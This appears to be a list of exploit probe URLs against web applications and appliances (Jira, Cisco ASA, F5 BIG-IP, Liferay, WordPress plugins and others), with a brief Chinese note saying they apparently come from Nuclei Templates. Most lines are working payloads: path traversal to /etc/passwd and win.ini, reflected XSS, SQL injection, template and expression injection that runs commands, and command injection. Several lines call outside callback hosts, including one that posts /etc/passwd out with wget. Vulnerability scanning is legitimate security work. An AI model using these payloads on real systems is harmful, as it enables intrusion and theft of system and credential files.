/searchblox/servlet/FileServlet?col=9&url=/etc/passwd
/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/ext-js/index.html
/actions/authenticate.php
/assets/php/upload.php
/assets/data/usrimg/2y9ka7wpvlmktpybo2tbl6xyeyy.php
/s/2Y9k9dvuahGIYeagFRl953imx0N/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/2Y9k9dvuahGIYeagFRl953imx0N/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true
/incom/modules/uploader/showcase/script.php
/upload/userfiles/image/2Y9k9ybI7005FNDZf0gceRFT2xO.png
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
/+CSCOE+/saml/sp/acs?tgname=a
/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/wp-content/plugins/easy-wp-smtp/
/auth/check
/wp-content/plugins/wp-mail-smtp-pro/
/index.php?module=users/login
/index.php?module=users/login
/auth/newpassword
/index.php?module=users/login
/index.php?module=users/login
/ebook/bookPerPub.php?pubid=4'
/backend/admin/common/clearcache?previousUrl=http://www.interact.sh
/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/_next/static/../server/pages-manifest.json
/auth/requestreset
/auth/requestreset
/dfsms/
/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development
/proxy.stream?origin=http://cl9hkovpu5aci1q5grr0ipp6irrtnatne.oast.pro
/wp-content/plugins/quiz-master-next/README.md
/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
/index.php/catalogsearch/advanced/result/?name=e
/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E
/EemAdminService/EemAdmin
/CTCWebService/CTCWebServiceBean/ConfigServlet
/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/os/mxperson
/meaweb/os/mxperson
/cgi-bin/libagent.cgi?type=J
/session/create
/PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E
/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
/metrics/v1/mbeans
/www/delivery/afr.php?refresh=10000&")',10000000);alert(1337);setTimeout('alert("
/menu/stapp
/menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/pandora_console/attachment/pandora_chat.log.json.txt
/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22
/cgi-bin/mainfunction.cgi
/index.php?app=main&inc=core_auth&route=login
/api/jsonws/invoke
signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData"
/index.php?page_slug=../../../../../etc/passwd%00
/api/jsonws/invoke
signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData"
/magmi/web/magmi_saveprofile.php
/magmi/web/magmi_run.php
/magmi/web/info.php
/css/eonweb.css
/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri
/index.php?v=d&p=%22;alert(document.domain);%22
/account/index.php
/opensis/index.php
/index.php
/version.web
/cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd
/wp-admin/index.php
/getcfg.php
/settings.php
/graphql
/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1
/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/menu/neo
/menu/stc
/index.jsp
/webtools/control/xmlrpc
/upload
/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF
/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF
/upload
/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF
/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF
/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2
/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4
/images/..%2finfo.html
/images/..%2finfo.html
/cache/backup/
/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}
/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}
/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1
/apply_sec.cgi
/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cl9hkovpu5aci1q5grr0jqwr1j8tuwmxs.oast.pro+-H+%27User-Agent:+x4Kvzc%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cl9hkovpu5aci1q5grr0is8o9rd7sx3eu.oast.pro+-H+%27User-Agent:+x4Kvzc%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cl9hkovpu5aci1q5grr08q33za1wmy74r.oast.pro+-H+%27User-Agent:+x4Kvzc%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cl9hkovpu5aci1q5grr0wuydd8qxcg54r.oast.pro+-H+%27User-Agent:+x4Kvzc%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/cgi-bin/mt/mt-xmlrpc.cgi
/images/..%2finfo.html
/images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken),
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything
/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything
/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20cl9hkovpu5aci1q5grr01eu8hua11znqy.oast.pro)
/wp-json/buddypress/v1/signup
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd
/ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini
/apply_sec.cgi
/apply_sec.cgi
/Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D
/goform/goform_get_cmd_process?cmd=psw_fail_num_str
/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E
/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E
/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22
/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22
/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22
/php/ping.php?hostname=|dir
/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/messages
/plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS
/plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
/plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/ui/vropspluginui/rest/services/getstatus
/casa/nodes/thumbprints
/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
/lucee/admin/imgProcess.cfm?file=/whatever
/lucee/admin/imgProcess.cfm?file=/../../../context/2Y9k9cnq0KR2XTgcrCevBhlfBot.cfm
/lucee/2Y9k9cnq0KR2XTgcrCevBhlfBot.cfm
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
/hsqldb%0a
/Catalog/BlobHandler.ashx?Url=YQB3AGUAdgAyADoAawB2ADAAOgB4AGwAawBiAEoAbwB5AGMAVwB0AFEAMwB6ADMAbABLADoARQBKAGYAYgBHAE4ATgBDADUARQBBAG0AZQBZAE4AUwBiAFoAVgBZAHYAZwBEAHYAdQBKAFgATQArAFUATQBkAGcAZAByAGMAMgByAEUAQwByAGIAcgBmAFQAVgB3AD0A
/tmui/locallb/workspace/tmshCmd.jsp
/tmui/locallb/workspace/fileSave.jsp
/_bulk
/tmui/locallb/workspace/tmshCmd.jsp
/tmui/locallb/workspace/tmshCmd.jsp
/users/sign_in
/api/v4/ci/lint?include_merged_yaml=true
/cgi-bin/cgiServer?worker=IndexNew
/auth/realms/master/clients-registrations/default
/auth/realms/master/clients-registrations/openid-connect
/realms/master/clients-registrations/default
/realms/master/clients-registrations/openid-connect
/AdminService/urest/v1/LogonResource
/api/v1/method.callAnon/getPasswordPolicy
/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../

漏洞挖掘的参考模板

上面的 Urls 应该是来自于 Nuclei Templates (仅供参考)：

https://github.com/projectdiscovery/nuclei-templates

例如 /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27：